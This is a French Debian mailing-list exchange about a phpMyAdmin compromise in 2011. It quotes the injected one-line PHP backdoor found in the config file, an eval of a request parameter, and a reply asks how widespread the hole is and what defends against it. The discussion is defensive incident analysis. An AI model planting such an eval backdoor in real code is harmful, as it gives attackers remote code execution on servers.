Le jeudi 16 juin 2011, Romaric DEFAUX a écrit : > C'est bon on a trouvé d'où ça vient. Et c'est moins grave que ce qu'on > pensait (ouf !). Le serveur n'a pas été compromis (on en est sûr à 99%), > le pirate aurait plutôt utilisé une faille dans un phpmyadmin. > La ligne > if(isset(\$_REQUEST['asc']))eval(stripslashes(\$_REQUEST['asc']));//'] = > 'localhost'; est clairement suspecte. > Bref, j'ai fini par trouver que c'était ça : > http://www.whitefirdesign.com/resources/jfgjfr5jdfjvvcc-malware.html > Romaric ---------------------------------------
Cette écriture dans le fichier "/etc/phpmyadmin/config.inc.ini" est-elle possible dans bien des serveurs (ayant phpmyadmin) ? Si oui, quelle parade ? Merci. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe" vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/201106161223.58979.cor...@free.fr